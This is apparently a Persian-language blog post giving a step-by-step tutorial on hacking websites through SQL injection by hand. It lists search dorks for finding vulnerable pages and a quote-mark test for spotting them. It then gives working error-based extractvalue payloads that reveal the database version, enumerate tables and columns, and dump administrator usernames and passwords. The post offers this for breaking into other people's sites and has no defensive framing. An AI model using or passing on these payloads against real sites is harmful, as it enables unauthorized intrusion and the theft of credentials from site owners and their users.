loading...
هک + طراحی سایت + نرم افزار
demo بازدید : 562 جمعه 25 دی 1394 نظرات (0)

سلام

میخوام توی این پست اموزش هک دستی (بدون نرم افزار) سایت دارای باگ sql رو اموزش بدم.

امیدوارم خوشتون بیاد.

اموزش:

مرحله ی اول اموزش شناسایی سایت باگ دار.

وارد سایت مورد نظر بشید و دنبال صفحه ای بگردید که اخرش 0870= باشه البته

فقط عدد 0870 نیست امکان داره هر عددی باشه این عدد رو برای مثال گزاشتم.

بعد از اینکه این صفحه رو پیدا کردید اخر ادرس علامت ' بزارید.

اگر صفحه به هم ریخته شد یا عوض شد یا دیگه لود نشد یا اروری مثل این داد:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1

یعنی سایت باگ داره.

به یه روش دیگه هم میشه سایت باگ دار رو پیدا کرد که اونم سرچ کردن دورک هست.

ما یه دورک برای اس کیو ال پیدا میکنیم و سرچ میکنیم سایت هایی که باز میشن همه اس کیو ال دارن.

چند تا از این دورک ها:

article.php?ID=
play_old.php?id=
declaration_more.php?decl_id=
Pageid=
games.php?id=
newsDetail.php?id=
staff_id=
historialeer.php?num=
product-item.php?id=
news_view.php?id=
humor.php?id=
communique_detail.php?id=

روش:

xpath injection
خوب ابتدا باید بعد از ادرس صفحه این کد رو کپی کنیم:

 

+and+extractvalue(rand(),concat(0x7e,version()))--

این کد باعث میشه که ورژن دیتابیس رو نمایش بده به ما.

بعد از به دست اوردن ورژن دیتا بیس باید تیبل هارو استخراج کنیم (ورژن دیتا بیس زیر 5 بود بیخیالش بشید)

برای استخراج تیبل از دستور زیر استفاده میکنیم:

+and+extractvalue(rand(),concat(0x7e,(select+table_name+from+information_schema.tables+limit+0,1)))--

خوب حالا برای اینکه تیبل های دیگه رو به دست بیاریم در قسمت اخر کد که نوشته شده 0,1 عدد 0 رو بالا ببرید تا تیبل هایی که میخواید رو به دست بیارید مثلا شما تیبل ادمین رو میخواید باید انقد امتحان کنید تا به تیبل مورد نظرتون برسید.

عدد رو باید به این صورت تغییر بدید مثلا : 0.1 رو به 1,1 بعد دوباره 2,1 و ... همینطوری پیش برید تا به تیل مورد نظرتون برسید.

بعد از پیدا کردن اسم تیبل مورد نظر باید کولمن هارو استخراج کنیم برای اینکار از دستور زیر استفاده میکنیم:

+and+extractvalue(rand(),concat(0x7e,(select+column_name+from+information_schema.columns+where+table_name=0xTABLENAME HEX SHODE+limit+0,1)))—

در قسمتی که نوشته شده tablename hex shode باید اسم تیبل مورد نظر رو به صورت hex شده وارد کنیم.

سایت هایی هستن که اینکارو انجام میدن.

خوب حالا
 برای پیدا کردن کولمن ها مثل همون پیدا کردن تیبل ها باید یکی یکی عدد رو ببریم بالا.

حالا به کولمن های مورد نظرتون که رسیدید مثلا یوزر نیم و پسورد.

حالا باید اطلاعات درون کولمن رو بیرون بکشیم به این صورت.

 

 

+and+extractvalue(rand(),concat(0x7e,(select+concat(column1,0x7e,column2)+from+table_
admin+limit+0,1)))--

 


 

کولمن های مورد نظرمون رو بایدتوی کولمن یک و دو که داخل کد میبینید بنویسیم.

 

این دستور رو هم که وارد کردید یوزر و پسورد به شما نمایش داده میشه.

 

امیدوارم لذت برده باشید.

برچسب ها sql , هک سایت با باگ sql , sql server ,
ارسال نظر برای این مطلب

کد امنیتی رفرش
اطلاعات کاربری
  • فراموشی رمز عبور؟
    • نویسندگان
  • demo
  • امیر شاهرخ
    • لینک دوستان
  • دانلود سریال جدید
  • آخرین مطالب ارسال شده
    • آرشیو
  • 1396
  • 1395
  • 1394
    • آمار سایت
  • کل مطالب : 43
  • کل نظرات : 0
  • افراد آنلاین : 15
  • تعداد اعضا : 14
  • آی پی امروز : 18
  • آی پی دیروز : 2
  • بازدید امروز : 22
  • باردید دیروز : 3
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 114
  • بازدید ماه : 178
  • بازدید سال : 530
  • بازدید کلی : 21,557

    • صفحه اصلی تالار گفتمان ثبت نام ورود آرشیو تماس با ما
    نیرو گرفته : رزبلاگ